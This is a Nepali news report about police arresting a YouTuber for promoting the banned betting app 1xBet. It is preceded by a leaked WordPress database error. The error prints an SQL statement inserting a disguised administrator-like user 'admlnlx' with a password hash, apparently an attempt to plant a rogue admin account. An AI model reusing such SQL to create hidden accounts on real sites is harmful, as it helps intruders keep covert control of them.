WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoCaaXLMagrHc/Kw5Fq0D1ZM0OXBVY/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:41:56', '', 'admlnlx', 'admlnlx')
काठमाडौ । नेपालमा प्रतिबन्धित अनलाइन बेटिङ एप ‘वानएक्स बेट’ मार्फत सट्टेबाजी र त्यसको विज्ञापन गरेको आरोपमा एक युट्युबरलाई प्रहरीले पक्राउ गरेको छ ।
काठमाडौं उपत्यका अपराध अनुसन्धान कार्यालयले युट्युबर राजकुमार तामाङलाई कपनबाट पक्राउ गरेको हो ।
राजकुमार थापा मगरको नामबाट परिचत उनले वान एक्स बेटिङको प्रचार प्रसार गरेको आरोप छ । काभ्रे घर भई काठमाडौंको बुढानिलकण्ठ बस्ने २२ वर्षीय तामाङलाई युट्युबमा मोटो-ब्लगिङ गर्छन्।
यसअघि प्रहरीले ‘वानएक्स बेट’मार्फत सट्टेबाजी र त्यसको विज्ञापन गरेको आरोपमा चर्चित कलाकार मरिचमान श्रेष्ठ ‘बल्छी ध्रुबे’, राजु मास्टरलगायत ८ जनालाई पक्राउ गरिसकेको छ ।